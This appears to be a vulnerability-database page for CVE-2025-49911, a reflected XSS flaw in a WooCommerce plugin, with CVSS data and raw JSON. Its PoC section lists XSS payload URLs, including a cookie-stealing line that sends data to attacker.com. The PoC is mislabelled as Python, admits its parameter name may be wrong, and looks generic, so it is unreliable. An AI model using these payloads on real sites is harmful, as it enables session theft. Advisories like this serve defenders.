Security Vulnerability Report
中文
CVE-2025-49911 CVSS 7.1 HIGH

CVE-2025-49911

Published: 2025-10-22 15:15:37
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpinstinct WooCommerce Vehicle Parts Finder woo-vehicle-parts-finder allows Reflected XSS.This issue affects WooCommerce Vehicle Parts Finder: from n/a through <= 3.7.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

wpinstinct WooCommerce Vehicle Parts Finder <= 3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Reflected XSS PoC for CVE-2025-49911 --> <!-- WooCommerce Vehicle Parts Finder <= 3.7 --> <!-- The vulnerability exists due to improper input neutralization in plugin parameters --> <!-- Example 1: Basic script injection via URL parameter --> https://target-site.com/?page_id=1&vehicle_part_search=<script>alert('XSS-CVE-2025-49911')</script> <!-- Example 2: Using img tag onerror event handler --> https://target-site.com/?page_id=1&vehicle_part_search=<img src=x onerror=alert(document.cookie)> <!-- Example 3: Using svg tag with onload event --> https://target-site.com/?page_id=1&vehicle_part_search=<svg/onload=alert('XSS')> <!-- Example 4: Cookie stealing payload (for demonstration) --> <!-- https://target-site.com/?page_id=1&vehicle_part_search=<script>fetch("https://attacker.com/steal?c="+document.cookie)</script> --> <!-- Note: The exact parameter name may vary depending on plugin configuration. --> <!-- Attackers typically need to identify the vulnerable parameter through testing. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49911", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:37.043", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpinstinct WooCommerce Vehicle Parts Finder woo-vehicle-parts-finder allows Reflected XSS.This issue affects WooCommerce Vehicle Parts Finder: from n/a through <= 3.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-vehicle-parts-finder/vulnerability/wordpress-woocommerce-vehicle-parts-finder-plugin-3-7-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}